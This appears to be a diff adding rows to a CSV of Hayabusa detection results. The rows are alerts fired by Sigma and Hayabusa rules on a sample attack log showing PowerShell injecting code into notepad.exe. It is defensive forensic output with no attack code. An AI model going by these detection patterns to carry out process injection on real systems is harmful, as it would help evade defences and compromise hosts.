+2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.817 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.833 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.848 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.864 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.880 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.895 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.926 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.942 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.973 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.989 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.005 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.020 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.036 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.051 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.083 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.098 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.114 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.130 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.145 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.161 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.192 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.208 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
